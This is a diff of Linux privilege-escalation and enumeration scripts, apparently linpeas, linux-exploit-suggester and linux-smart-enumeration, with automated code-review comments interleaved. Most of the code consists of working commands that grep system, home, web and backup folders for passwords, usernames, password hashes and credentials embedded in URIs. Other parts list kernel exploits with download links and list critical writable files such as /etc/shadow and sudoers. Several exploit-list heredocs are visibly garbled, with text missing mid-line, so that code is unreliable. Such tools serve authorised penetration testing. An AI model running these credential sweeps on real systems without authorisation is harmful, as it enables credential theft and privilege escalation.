"s,$knw_emails,${C}[1;32m&${C}[0m,g" echo "" ##-- IF) Passwords files in home printf $Y"[+] "$GREEN"Finding *password* or *credential* files in home (limit 70)\n"$NC - (echo "$FIND_HOME $FIND_ROOT $FIND_USERS" | grep -E '.*password.*|.*credential.*|creds.*' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " There are more creds/passwds files in the previous parent folder"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -E "s,password|credential,${C}[1;31m&${C}[0m," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[1;32m&${C}[0m,") || echo_not_found + (echo "$FIND_HOME $FIND_USR" | grep -E '.*password.*|.*credential.*|creds.*' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; 
$NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${C}[1;31m&${C}[0m," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found echo "" if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Find possible files with passwords - printf $Y"[+] "$GREEN"Finding 'pwd' or 'passw' variables (and interesting php db definitions) inside key folders (limit 70)\n"$NC - timeout 120 grep -RiIE "(pwd|passwd|password).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" /home /var/www /var/backups /tmp /etc /root /mnt /Users /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | grep -iv "linpeas" | head -n 70 | sed -E "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" + printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - only PHP files\n"$NC + intpwdfiles=`timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /root /mnt /Users /private 2>/dev/null` + printf "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" + echo "" + + printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - no PHP files\n"$NC + printf "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g" echo "" ##-- IF) Find possible files with passwords - printf $Y"[+] "$GREEN"Finding possible password variables inside key folders (limit 
70)\n"$NC - timeout 120 grep -RiIE "($pwd_in_variables).*[=:].+" /home /var/www /var/backups /tmp /etc /root /mnt /Users /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | head -n 70 | sed -E "s,$pwd_in_variables,${C}[1;31m&${C}[0m,g" + printf $Y"[+] "$GREEN"Finding possible password variables inside key folders (limit 140)\n"$NC + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} 
"s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g" echo "" ##-- IF) Find possible conf files with passwords printf $Y"[+] "$GREEN"Finding possible password in config files\n"$NC - ppicf=`find /home /etc /root /tmp /Users /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" 2>/dev/null` + ppicf=`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null` printf "$ppicf\n" | while read f; do if [ "`grep -EiI 'passwd.*|creden.*' \"$f\" 2>/dev/null`" ]; then echo $ITALIC" $f"$NC - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -E "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${C}[1;31m&${C}[0m,g" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${C}[1;31m&${C}[0m,g" fi done echo "" ##-- IF) Find possible files with usernames printf $Y"[+] "$GREEN"Finding 'username' string inside key folders (limit 70)\n"$NC - timeout 120 grep -RiIE "username.*[=:].+" /home /var/www /var/backups /tmp /etc /root /mnt /Users /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | head -n 70 | sed -E "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" + timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed 
-${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" echo "" ##-- IF) Specific hashes inside files 
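Review bot: In the new `ppicf=\`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null\`` the `-o` before `-name "*.json"` is missing, so find ANDs the last two tests: no file can match both `*.config` and `*.json`, which drops the `.config` files that used to be found and never finds the `.json` files the change meant to add. Insert the operator: `-name "*.config" -o -name "*.json"`. The new `printf "$intpwdfiles" | grep -I ".php:"` and `printf "$intpwdfiles" | grep -vI ".php:"` lines use grep output (file contents) as the printf format string, which garbles any match containing `%` or `\`; use `printf "%s\n" "$intpwdfiles"` in both. The `if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]` block that opens in this hunk closes in the following one.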
@@ -2668,31 +3185,31 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 120 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | head -n 70 | sed "s,:.*,${C}[1;31m&${C}[0m," + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${C}[1;31m&${C}[0m," echo "" fi if ! [ "$FAST" ] && ! 
[ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Specific hashes inside files - printf $Y"[+] "$GREEN"Searching md5/sha1/sha256/sha512 hashes inside files (limit 50)\n"$NC + printf $Y"[+] "$GREEN"Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)\n"$NC regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 120 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " There are more hashes files in the previous parent folder"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${C}[1;31m&${C}[0m," | sed "s,There are more hashes files in the previous parent folder,${C}[1;32m&${C}[0m," + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${C}[1;31m&${C}[0m," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," echo "" fi if ! [ "$SUPERFAST" ] && ! 
[ "$FAST" ]; then ##-- IF) Find URIs with user:password@hoststrings printf $Y"[+] "$GREEN"Finding URIs with user:password@host inside key folders\n"$NC - timeout 120 grep -RiIE "://(.+):(.+)@" /var/www /var/backups /tmp /etc /var/log /private/var/log 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /home 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /var/www $backup_folders_row /tmp /etc /var/log /private/var/log 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" $HOMESEARCH 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" 
/root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" echo "" fi fi diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh index fc5d5b8..b35ed0e 100755 --- a/linux-exploit-suggester.sh +++ b/linux-exploit-suggester.sh 
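Review bot: The rewritten URI checks (`timeout 150 grep -RiIE "://(.+):(.+)@" ... | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | ...`) drop every line containing a `#` anywhere, not only commented-out lines, so a hit whose password or URL fragment contains `#` is silently discarded. The password-variable greps earlier in this commit switched to the anchored `grep -Ev "^#"`; using the same idea here, e.g. `grep -Ev "^[[:space:]]*#"`, keeps intent and output consistent across the checks. The first hash search (`grep -RIEHo "$regexblowfish|..."`) also lost its `awk -F: '{if (pre != $1){ print $0; }; pre=$1}'` per-file dedup while the md5/sha search kept it, so one file with many hashes can now consume the whole 70-line limit; if that is intended, its header should say so the way the second check's now does. The first lines of this hunk belong to an `if` block that opens in the previous hunk.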
@@ -256,21 +256,39 @@ EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 -Tags: +Tags: debian=4 Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz exploit-db: 9574 +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html +author: spender +Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 +Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg +Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 Tags: debian=4 Rank: 1 exploit-db: 9575 +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html +author: andi +Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +EOF +) + +EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19,x86 +Tags: debian=4 +Rank: 1 +src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html +author: VxHell Labs +Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) @@ -279,7 +297,10 @@ Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 Tags: fedora=4|5|6,RHEL=4 Rank: 1 +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html exploit-db: 9542 +author: p0c73n1 +Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) @@ -871,6 +892,18 @@ author: Vitaly 'vnik' Nikolenko EOF ) +EXPLOITS[((n++))]=$(cat < # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="1.11" +lse_version="3.2" #( Colors # 
@@ -82,132 +83,198 @@ lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/De lse_passed_tests="" lse_executed_tests="" lse_DEBUG=false +lse_procmon_data=`mktemp` +lse_procmon_lock=`mktemp` + +# printf +printf "$reset" | grep -q '\\' && alias printf="env printf" # internal data -lse_common_setuid=( - '/bin/fusermount' - '/bin/mount' - '/bin/ntfs-3g' - '/bin/ping' - '/bin/ping6' - '/bin/su' - '/bin/umount' - '/lib64/dbus-1/dbus-daemon-launch-helper' - '/sbin/mount.ecryptfs_private' - '/sbin/mount.nfs' - '/sbin/pam_timestamp_check' - '/sbin/pccardctl' - '/sbin/unix2_chkpwd' - '/sbin/unix_chkpwd' - '/usr/bin/Xorg' - '/usr/bin/arping' - '/usr/bin/at' - '/usr/bin/beep' - '/usr/bin/chage' - '/usr/bin/chfn' - '/usr/bin/chsh' - '/usr/bin/crontab' - '/usr/bin/expiry' - '/usr/bin/firejail' - '/usr/bin/fusermount' - '/usr/bin/fusermount-glusterfs' - '/usr/bin/gpasswd' - '/usr/bin/kismet_capture' - '/usr/bin/mount' - '/usr/bin/mtr' - '/usr/bin/newgidmap' - '/usr/bin/newgrp' - '/usr/bin/newuidmap' - '/usr/bin/passwd' - '/usr/bin/pkexec' - '/usr/bin/procmail' - '/usr/bin/staprun' - '/usr/bin/su' - '/usr/bin/sudo' - '/usr/bin/sudoedit' - '/usr/bin/traceroute6.iputils' - '/usr/bin/umount' - '/usr/bin/weston-launch' - '/usr/lib/chromium-browser/chrome-sandbox' - '/usr/lib/dbus-1.0/dbus-daemon-launch-helper' - '/usr/lib/dbus-1/dbus-daemon-launch-helper' - '/usr/lib/eject/dmcrypt-get-device' - '/usr/lib/openssh/ssh-keysign' - '/usr/lib/policykit-1/polkit-agent-helper-1' - '/usr/lib/polkit-1/polkit-agent-helper-1' - '/usr/lib/pt_chown' - '/usr/lib/snapd/snap-confine' - '/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper' - '/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic' - '/usr/lib/xorg/Xorg.wrap' - '/usr/libexec/Xorg.wrap' - '/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache' - '/usr/libexec/dbus-1/dbus-daemon-launch-helper' - '/usr/libexec/gstreamer-1.0/gst-ptp-helper' - '/usr/libexec/openssh/ssh-keysign' - '/usr/libexec/polkit-1/polkit-agent-helper-1' 
- '/usr/libexec/pt_chown' - '/usr/libexec/qemu-bridge-helper' - '/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper' - '/usr/sbin/exim4' - '/usr/sbin/grub2-set-bootflag' - '/usr/sbin/mount.nfs' - '/usr/sbin/mtr-packet' - '/usr/sbin/pam_timestamp_check' - '/usr/sbin/pppd' - '/usr/sbin/pppoe-wrapper' - '/usr/sbin/suexec' - '/usr/sbin/unix_chkpwd' - '/usr/sbin/userhelper' - '/usr/sbin/usernetctl' - '/usr/sbin/uuidd' -) +lse_common_setuid=" +/bin/fusermount +/bin/mount +/bin/ntfs-3g +/bin/ping +/bin/ping6 +/bin/su +/bin/umount +/lib64/dbus-1/dbus-daemon-launch-helper +/sbin/mount.ecryptfs_private +/sbin/mount.nfs +/sbin/pam_timestamp_check +/sbin/pccardctl +/sbin/unix2_chkpwd +/sbin/unix_chkpwd +/usr/bin/Xorg +/usr/bin/arping +/usr/bin/at +/usr/bin/beep +/usr/bin/chage +/usr/bin/chfn +/usr/bin/chsh +/usr/bin/crontab +/usr/bin/expiry +/usr/bin/firejail +/usr/bin/fusermount +/usr/bin/fusermount-glusterfs +/usr/bin/gpasswd +/usr/bin/kismet_capture +/usr/bin/mount +/usr/bin/mtr +/usr/bin/newgidmap +/usr/bin/newgrp +/usr/bin/newuidmap +/usr/bin/passwd +/usr/bin/pkexec +/usr/bin/procmail +/usr/bin/staprun +/usr/bin/su +/usr/bin/sudo +/usr/bin/sudoedit +/usr/bin/traceroute6.iputils +/usr/bin/umount +/usr/bin/weston-launch +/usr/lib/chromium-browser/chrome-sandbox +/usr/lib/dbus-1.0/dbus-daemon-launch-helper +/usr/lib/dbus-1/dbus-daemon-launch-helper +/usr/lib/eject/dmcrypt-get-device +/usr/lib/openssh/ssh-keysign +/usr/lib/policykit-1/polkit-agent-helper-1 +/usr/lib/polkit-1/polkit-agent-helper-1 +/usr/lib/pt_chown +/usr/lib/snapd/snap-confine +/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper +/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic +/usr/lib/xorg/Xorg.wrap +/usr/libexec/Xorg.wrap +/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache +/usr/libexec/dbus-1/dbus-daemon-launch-helper +/usr/libexec/gstreamer-1.0/gst-ptp-helper +/usr/libexec/openssh/ssh-keysign +/usr/libexec/polkit-1/polkit-agent-helper-1 +/usr/libexec/pt_chown +/usr/libexec/qemu-bridge-helper 
+/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper +/usr/sbin/exim4 +/usr/sbin/grub2-set-bootflag +/usr/sbin/mount.nfs +/usr/sbin/mtr-packet +/usr/sbin/pam_timestamp_check +/usr/sbin/pppd +/usr/sbin/pppoe-wrapper +/usr/sbin/suexec +/usr/sbin/unix_chkpwd +/usr/sbin/userhelper +/usr/sbin/usernetctl +/usr/sbin/uuidd +" #regex rules for common setuid -lse_common_setuid+=( - '/snap/core/.*' - '/var/tmp/mkinitramfs.*' -) +lse_common_setuid="$lse_common_setuid +/snap/core/.* +/var/tmp/mkinitramfs.* +" #critical writable files -lse_critical_writable=( - '/etc/apache2/apache2.conf' - '/etc/apache2/httpd.conf' - '/etc/hosts.allow' - '/etc/hosts.deny' - '/etc/httpd/conf/httpd.conf' - '/etc/httpd/httpd.conf' - '/etc/incron.conf' - '/etc/incron.d/*' - '/etc/passwd' - '/etc/php*/fpm/pool.d/*' - '/etc/php/*/fpm/pool.d/*' - '/etc/shadow' - '/etc/sudoers' - '/etc/supervisor/conf.d/*' - '/etc/supervisor/supervisord.conf' - '/etc/uwsgi/apps-enabled/*' - '/root/.ssh/authorized_keys' -) +lse_critical_writable=" +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/bash.bashrc +/etc/bash_completion +/etc/bash_completion.d/* +/etc/environment +/etc/environment.d/* +/etc/hosts.allow +/etc/hosts.deny +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/incron.conf +/etc/incron.d/* +/etc/logrotate.d/* +/etc/modprobe.d/* +/etc/pam.d/* +/etc/passwd +/etc/php*/fpm/pool.d/* +/etc/php/*/fpm/pool.d/* +/etc/profile +/etc/profile.d/* +/etc/rc*.d/* +/etc/rsyslog.d/* +/etc/shadow +/etc/skel/* +/etc/sudoers +/etc/sudoers.d/* +/etc/supervisor/conf.d/* +/etc/supervisor/supervisord.conf +/etc/sysctl.conf +/etc/sysctl.d/* +/etc/uwsgi/apps-enabled/* +/root/.ssh/authorized_keys +" +#critical writable directories +lse_critical_writable_dirs=" +/etc/bash_completion.d +/etc/cron.d +/etc/cron.daily +/etc/cron.hourly +/etc/cron.weekly +/etc/environment.d +/etc/logrotate.d +/etc/modprobe.d +/etc/pam.d +/etc/profile.d +/etc/rsyslog.d/ +/etc/sudoers.d/ +/etc/sysctl.d +/root +" #) #( Options 
lse_color=true +lse_alt_color=false lse_interactive=true +lse_proc_time=60 lse_level=0 #Valid levels 0:default, 1:interesting, 2:all lse_selection="" #Selected tests to run. Empty means all. +lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o' #paths to exclude from searches +lse_grep_opts='--color=always' #) #( Lib cecho() { if $lse_color; then - printf "$@" + printf "%b" "$@" else # If color is disabled we remove it - printf "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' + printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' fi } +lse_recolor() { + o_white="$white" + o_lyellow="$lyellow" + o_grey="$grey" + o_lred="$lred" + o_lgreen="$lgreen" + o_lcyan="$lcyan" + + white="$o_grey" + lyellow="$o_lred" + grey="$lgrey" + lred="$red" + lgreen="$b_lgreen$black" + lcyan="$cyan" +} lse_error() { cecho "${red}ERROR: ${reset}$*\n" >&2 } +lse_exclude_paths() { + local IFS=" +" + for p in `printf "%s" "$1" | tr ',' '\n'`; do + [ "`printf \"%s\" \"$p\" | cut -c1`" = "/" ] || lse_error "'$p' is not an absolute path." + p="${p%%/}" + lse_find_opts="$lse_find_opts -path ${p} -prune -o" + done +} lse_set_level() { case "$1" in 0|1|2) 
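Review bot: `lse_exclude_paths` reports a relative entry with `lse_error "'$p' is not an absolute path."` but then falls through and still appends it to `lse_find_opts`, because `lse_error` only prints (its body is `cecho "${red}ERROR: ${reset}$*\n" >&2`). Reject the entry instead: `[ "\`printf \"%s\" \"$p\" | cut -c1\`" = "/" ] || { lse_error "'$p' is not an absolute path."; continue; }`. The two `mktemp` files created at the top (`lse_procmon_data`, `lse_procmon_lock`) are removed only by `lse_exit`, so an interrupted run leaves them behind; a `trap 'lse_exit 130' INT TERM` next to their creation covers that path (the trap string is evaluated at signal time, so `lse_exit` may be defined later in the file). `p="${p%%/}"` strips exactly one trailing slash, so `/opt//` still yields `/opt/`. If this script is ever run under bash, `alias printf="env printf"` has no effect in a non-interactive shell unless `shopt -s expand_aliases` is set, whereas POSIX sh implementations do expand it; a comment stating which shells the alias targets would avoid surprises.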
@@ -223,34 +290,41 @@ lse_help() { echo "Use: $0 [options]" echo echo " OPTIONS" - echo " -c Disable color" - echo " -i Non interactive mode" - echo " -h This help" - echo " -l LEVEL Output verbosity level" - echo " 0: Show highly important results. (default)" - echo " 1: Show interesting results." - echo " 2: Show all gathered information." - echo " -s SELECTION Comma separated list of sections or tests to run. Available" - echo " sections:" - echo " usr: User related tests." - echo " sud: Sudo related tests." - echo " fst: File system related tests." - echo " sys: System related tests." - echo " sec: Security measures related tests." - echo " ret: Recurren tasks (cron, timers) related tests." - echo " net: Network related tests." - echo " srv: Services related tests." - echo " pro: Processes related tests." - echo " sof: Software related tests." - echo " ctn: Container (docker, lxc) related tests." - echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" + echo " -c Disable color" + echo " -C Use alternative color scheme" + echo " -i Non interactive mode" + echo " -h This help" + echo " -l LEVEL Output verbosity level" + echo " 0: Show highly important results. (default)" + echo " 1: Show interesting results." + echo " 2: Show all gathered information." + echo " -s SELECTION Comma separated list of sections or tests to run. Available" + echo " sections:" + echo " usr: User related tests." + echo " sud: Sudo related tests." + echo " fst: File system related tests." + echo " sys: System related tests." + echo " sec: Security measures related tests." + echo " ret: Recurrent tasks (cron, timers) related tests." + echo " net: Network related tests." + echo " srv: Services related tests." + echo " pro: Processes related tests." + echo " sof: Software related tests." + echo " ctn: Container (docker, lxc) related tests." + echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" + echo " -e PATHS Comma separated list of paths to exclude. 
